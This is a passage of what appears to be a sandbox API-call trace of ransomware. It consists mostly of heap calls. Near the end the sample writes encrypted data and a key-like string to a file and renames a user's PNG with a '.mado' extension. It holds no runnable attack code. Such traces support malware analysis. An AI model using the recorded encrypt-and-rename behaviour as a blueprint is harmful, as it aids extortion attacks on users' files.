RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a10 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.006] GetCurrentThreadId () returned 0x600 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff118 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.007] GetCurrentThreadId () returned 0x600 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a10 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a10 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799e0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66c90 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.010] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x16be5, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x16be5, lpOverlapped=0x0) returned 1 [0206.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.011] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16bea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.011] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0206.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.011] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.012] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.012] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.012] CloseHandle (hObject=0x63c) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.014] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\sdMjB_rSafH1n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\sdmjb_rsafh1n.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\sdMjB_rSafH1n.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\sdmjb_rsafh1n.png.mado")) returned 1 [0206.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.014] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.015] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf83f70, ftCreationTime.dwHighDateTime=0x1d5e734, ftLastAccessTime.dwLowDateTime=0x9ab22230, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0x9ab22230, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x16bea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sdMjB_rSafH1n.png", cAlternateFileName="SDMJB_~1.PNG")) returned 0 [0206.015] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0206.016] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.016] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.018] RtlAllocateHeap 